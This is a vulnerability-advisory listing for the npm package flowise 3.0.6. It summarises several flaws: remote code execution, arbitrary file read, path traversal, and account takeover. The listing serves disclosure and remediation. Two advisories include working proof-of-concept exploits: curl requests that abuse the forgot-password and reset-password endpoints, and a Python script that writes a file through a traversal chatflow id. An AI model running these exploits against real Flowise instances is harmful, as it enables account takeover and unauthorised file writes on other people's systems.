Search for packages
| purl | pkg:npm/flowise@3.0.6 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
| This package is not known to be affected by vulnerabilities. | ||
| Vulnerability | Summary | Aliases |
|---|---|---|
| VCID-2wkq-5agr-6bgz | Flowise has Remote Code Execution vulnerability The CustomMCP node allows users to input configuration settings for connecting to an external MCP (Model Context Protocol) server. This node parses the user-provided mcpServerConfig string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation. Specifically, inside the convertToValidJSONString function, user input is directly passed to the Function() constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as child_process and fs. |
CVE-2025-59528
GHSA-3gcm-f6qx-ff7p |
| VCID-5vb2-73xr-97cw | Duplicate Advisory: FlowiseAI Pre-Auth Arbitrary Code Execution ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-7944-7c6r-55vv. This link is maintained to preserve external references. ### Original Description Flowise through v3.0.4 is vulnerable to remote code execution via unsanitized evaluation of user input in the "Supabase RPC Filter" field. |
GHSA-3g4j-r53p-22wx
|
| VCID-8sv7-ezxh-eyhq | Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover ### Summary The `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete **account takeover (ATO)**. This vulnerability applies to **both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments** that expose the same API. **CVSS v3.1 Base Score:** **9.8 (Critical)** **Vector String:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` --- ### Details * The endpoint `/api/v1/account/forgot-password` accepts an email address as input. * Instead of only sending a reset email, the API **responds directly with sensitive user details**, including: * User ID, name, email, hashed credential, status, timestamps. * **A valid `tempToken` and its expiry**, which is intended for password reset. * This `tempToken` can then be reused immediately in the `/api/v1/account/reset-password` endpoint to reset the password of the targeted account **without any email verification** or user interaction. * Exploitation requires only the victim’s email address, which is often guessable or discoverable. * Because the vulnerable endpoints exist in both **Flowise Cloud** and **local/self-hosted deployments**, any exposed instance is vulnerable to account takeover. This effectively allows any unauthenticated attacker to **take over arbitrary accounts** (including admin or privileged accounts) by requesting a reset for their email. --- ### PoC 1. **Request a reset token for the victim** ```bash curl -i -X POST https://<target>/api/v1/account/forgot-password \ -H "Content-Type: application/json" \ -d '{"user":{"email":"<victim@example.com>"}}' ``` **Response (201 Created):** ```json { "user": { "id": "<redacted-uuid>", "name": "<redacted>", "email": "<victim@example.com>", "credential": "<redacted-hash>", "tempToken": "<redacted-tempToken>", "tokenExpiry": "2025-08-19T13:00:33.834Z", "status": "active" } } ``` 2. **Use the exposed `tempToken` to reset the password** ```bash curl -i -X POST https://<target>/api/v1/account/reset-password \ -H "Content-Type: application/json" \ -d '{ "user":{ "email":"<victim@example.com>", "tempToken":"<redacted-tempToken>", "password":"NewSecurePassword123!" } }' ``` **Expected Result:** `200 OK` The victim’s account password is reset, allowing full login. --- ### Impact * **Type:** Authentication bypass / Insecure direct object exposure. * **Impact:** * Any account (including administrator or high-value accounts) can be reset and taken over with only the email address. * Applies to **both Flowise Cloud and locally hosted/self-managed deployments**. * Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets. * High likelihood of exploitation since no prior access or user interaction is required. --- ### Recommended Remediation * **Do not return reset tokens** or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel. * Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration. * Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery). * Apply the same fixes to **both cloud and self-hosted/local deployments**. * Log and monitor password reset requests for suspicious activity. * Consider multi-factor verification for sensitive accounts. Credit --- ⚠️ This is a **Critical ATO vulnerability** because it allows attackers to compromise any account with only knowledge of an email address, and it applies to **all deployment models (cloud and local)**. --- |
CVE-2025-58434
GHSA-wgpv-6j63-x5ph |
| VCID-8wyy-ep3u-xkh5 | Flowise has an Arbitrary File Read An arbitrary file read vulnerability in the `chatId` parameter supplied to both the `/api/v1/get-upload-file` and `/api/v1/openai-assistants-file/download` endpoints allows unauthenticated users to read unintended files on the local filesystem. In the default Flowise configuration this allows reading of the local sqlite db and subsequent compromise of all database content. |
GHSA-99pg-hqvx-r4gf
|
| VCID-gjgw-sjnh-zkhr | Duplicate This advisory duplicates another. |
CVE-2025-59527
GHSA-hr92-4q35-4j3m |
| VCID-prvx-mjqx-fuew | Flowise has arbitrary file access due to missing chat flow id validation ### Summary Missing chat flow id validation allows an attacker to access arbitrary file. ### Details Commit https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added check for `filename` when handling file upload operations to prevent path traversal, and additional validation of `chatflowId` and `chatId` from route `/api/v1/attachments`. In some cases, however, `chatflowId` and `chatId` are not validated to ensure they are UUIDs or numbers, which may lead to security issues. **Case 1** When creating new chatflow via `/api/v1/chatflows`, function `addBase64FilesToStorage` is called if there exists base64 file data. Although the `filename` is sanitized, the `chatflowid` comes from request body directly without any validation. An attacker could exploit the path traversal here to write arbitrary file with controlled data. ```typescript export const addBase64FilesToStorage = async (fileBase64: string, chatflowid: string, fileNames: string[]) => { // ... } else { const dir = path.join(getStoragePath(), chatflowid) // path traversal here if (!fs.existsSync(dir)) { fs.mkdirSync(dir, { recursive: true }) } const splitDataURI = fileBase64.split(',') const filename = splitDataURI.pop()?.split(':')[1] ?? '' const bf = Buffer.from(splitDataURI.pop() || '', 'base64') const sanitizedFilename = _sanitizeFilename(filename) const filePath = path.join(dir, sanitizedFilename) fs.writeFileSync(filePath, bf) fileNames.push(sanitizedFilename) return 'FILE-STORAGE::' + JSON.stringify(fileNames) } } ``` **Case 2** When downloading file via `/api/v1/openai-assistants-file/download` or `/api/v1/get-upload-file`, function `streamStorageFile` is called to retrieve file data from local or cloud bucket. The `chatflowId` and `chatId` are used for file path generation. Take Amazon S3 as an example, its [[documentation indicates](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines)](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines) that `../` will be treated as relative path. Note that these APIs are in `WHITELIST_URLS`, an attacker may traverse user storage files without authentication. ### PoC Launch app at localhost with default config, then run the following python script, a file named 'pwn' will be written to dir `/tmp` with content 'Hello, World!'. ```python import requests import json url = "http://localhost:8080/api/v1/chatflows" headers = {"x-request-from": "internal"} nodedata = { "category" : "Document Loaders", "inputs" : { "key" : "data:text/plain;base64,SGVsbG8sIFdvcmxkIQ==,a:pwn" } } flownode = { "id" : "a", "data" : nodedata } flowdata = { "nodes" : [flownode], "edges" : [], "viewport" : { "x" : 1, "y" : 1, "zoom" : 1 } } data = { "id" : "../../../../../tmp", "name" : "name", "flowData" : json.dumps(flowdata) } res = requests.post(url, json=data, headers=headers) ``` ### Impact 1. Arbitrary file read / write 2. Remote Code Execution 3. Data loss |
GHSA-q67q-549q-p849
|
| VCID-rhdz-rcy5-y3a6 | Duplicate This advisory duplicates another. |
CVE-2025-57164
GHSA-7944-7c6r-55vv |
| VCID-zmed-seae-ebfe | Flowise has unsandboxed remote code execution via Custom MCP The Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, the default installation of Flowise operates without authentication unless explicitly configured using the `FLOWISE_USERNAME` and `FLOWISE_PASSWORD` environment variables. This combination presents a significant security risk, potentially allowing users on the platform to execute unsandboxed system commands. This can result in Remote Code Execution (RCE) and complete compromise of the running platform container or server. |
GHSA-6933-jpx5-q87q
|